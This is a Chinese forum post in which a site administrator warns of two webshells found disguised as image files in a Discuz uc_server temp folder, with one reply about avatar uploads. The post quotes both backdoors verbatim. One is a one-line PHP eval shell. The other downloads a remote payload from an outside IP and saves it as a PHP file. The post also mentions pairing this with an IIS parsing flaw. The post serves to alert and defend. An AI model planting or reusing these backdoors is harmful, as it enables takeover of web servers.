uc_server\data\tmp被上传木马文件 建议自查

onlygod

今天网站搬家，顺手用最新版的D盾扫描了一下，发现两个可疑文件，图片格式。

路径为：uc_server\data\tmp

将格式图片格式的后缀改为  .php，用记事本打开，发现一句话木马，两个文件分别如下：

1. <?php @eval($_POST['1']);?>

复制代码

1. <script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt');  file_put_contents('a.php',$save) ;</script>

复制代码

目前暂时没扫出其他木马，怀疑上传木马后并没有成功执行。

文件名分别为：
upload37372
upload29060

后面的数字应该是用户ID，建议将图片改成随机数字命名，否则容易被黑客利用。
IIS的解析漏洞，配合这个，有可能能拿下webshell。

-------建议大家自查一下。  不知道新版有木有这个漏洞，知道的大神说下。

我知道答案 回答被采纳将会获得1 贡献 已有1人回答

耗子

这种情况一般都是头像进来的， 做好防护措施  尤其服务器  广告IIS有这个漏洞 包括  这个是PHP的漏洞